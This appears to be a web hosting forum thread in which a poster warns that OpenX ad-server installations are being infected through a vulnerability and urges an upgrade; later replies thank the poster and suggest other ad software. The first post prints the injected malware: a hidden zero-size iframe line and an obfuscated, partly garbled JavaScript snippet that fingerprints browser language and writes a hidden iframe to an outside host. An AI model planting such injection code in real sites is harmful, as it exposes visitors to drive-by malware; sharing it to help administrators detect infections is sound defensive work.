Results 1 to 6 of 6
  1. #1

    Openx ad malware

    Hello all,
    Just thought to share what we have been observing on OpenX enabled sites for the last little while. This info might help to quickly identify if any sites you manage are infected due to an OpenX vulnerability or not.

    Please consider upgrading to ver 2.8.7.

    Whenever a user visits a site hosting ads via OpenX, the /www/delivery/ajs.php code in OpenX dynamically creates Javascript code that is embedded when the ads are displayed to the visitor on a webpage. In most cases a piece of malware in the form of a small Javascript snippet is attached to the location:
    This piece of malware loads in an Iframe element which looks like:

    document.write('<iframe src="" width=0 height=0></iframe>');
    This piece of malware gets injected on every page that is served out with the ad, and is usually located on the very first line of the web page.
    You can verify this easily by simply viewing the source of the webpage.

    An example of the dynamic Javascript which inserts this malware looks like:
    var dc=document; var date_ob=new Date(); dc.cookie=h1=o; path=/;;if(dc.cookie.indexOf(3=llo) 0){
    function clng(str1,str2,str3){var cou=new Array(cn,'gt,'tn,'br,'id,'bg,'pl,'be,'gp,'my,'th,'iq,'ro,'ba,'pk,'tr,'dz,'ma,'re,'ae,'gf,'ru,'om,'il,'gr,'vn,'kw,'ci,sa,'do,'pt,'hr,'eg,'qa,'ro,'tw,'al,'hk,'ps,'eg,'do,'lt,'dk,'jo,'pk,'ma,'pr,'mk,'dz,'ge,'hr,'gr,'bg,'ba,'pt,si,'tn,'pl,'be,'ir,sk,'hu,'az,'bo,'by,'cr,'cz,'ec,'ee,'lk,'lv,'md,'mt,'pa,'rs,sv,'tt,'ua,'uy);
    for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
    if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
    if(typeof run == undefined){dc.writeln(<!);dc.writeln(var host= widt+'h=1 h+'eight+'=1 ; var src=src=; var brdr=fra+'mebor+'der=+'0′;var sc=\http:[email protected]\ ;);dc.writeln(document.write(););dc.writeln(//>);} var run=1;
    date_ob.setTime(date_ob.getTime()+86400000);dc.cookie=h3=llo; path=/; expires=+date_ob.toGMTString();}
    The good news is that upgrading OpenX to the most recent version, at least 2.8.5 to 2.8.7 and above, fixes the vulnerability.

    A very good resource about how to secure your OpenX installation is found at

    A related thread is also present at

    Hope this helps.

  2. #2
    Join Date
    Apr 2011
    Thanks for the info. I used OpenX for rotating product banners and ads for my site and I think I need to check them to see if there's a malware planted on my sites.

  3. #3
    This information is really helpful.

  4. #4
    Join Date
    Feb 2010
    Hi folks,
    OpenX has been under siege for well over a year. I strongly urge anyone using it to consider alternatives as well. I have nothing against the OpenX folks. They seem like well meaning people over there, though they can't seem to keep ahead of the malware and hackers who see the software as an easy target to promote their body part growth pills and the like...

    You can read about the ongoing drama relating to this service by entering "openx" in the Google Webmaster Central forums. Virtually every other month it seems there is some new hack, forcing everyone to upgrade or else. It's pretty tragic to say the least.

    Best Wishes,
    Jim Walker
    The Hack Repair Guy

  5. #5
    Quote Originally Posted by tvcnet View Post
    OpenX has been under siege for well over a year. I strongly urge anyone using it to consider alternatives as well.
    Can you recommend any alternatives?

  6. #6
    Join Date
    Mar 2011
    Thanks for the heads up

Similar Threads

  1. OpenX VPS
    By robtuk in forum VPS Hosting
    Replies: 22
    Last Post: 12-09-2010, 08:15 PM
  2. Openx vs Google Ad Manager
    By san-deep in forum Hosting Software and Control Panels
    Replies: 0
    Last Post: 07-09-2010, 04:26 AM
  3. OpenX
    By Hassan in forum Web Hosting Lounge
    Replies: 0
    Last Post: 09-03-2009, 07:04 PM
  4. openx problem
    By Chinese Democracy in forum Hosting Security and Technology
    Replies: 6
    Last Post: 04-22-2009, 01:24 AM
  5. VPS server for OpenX
    By bobbyjoes12 in forum VPS Hosting
    Replies: 1
    Last Post: 10-26-2008, 07:41 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts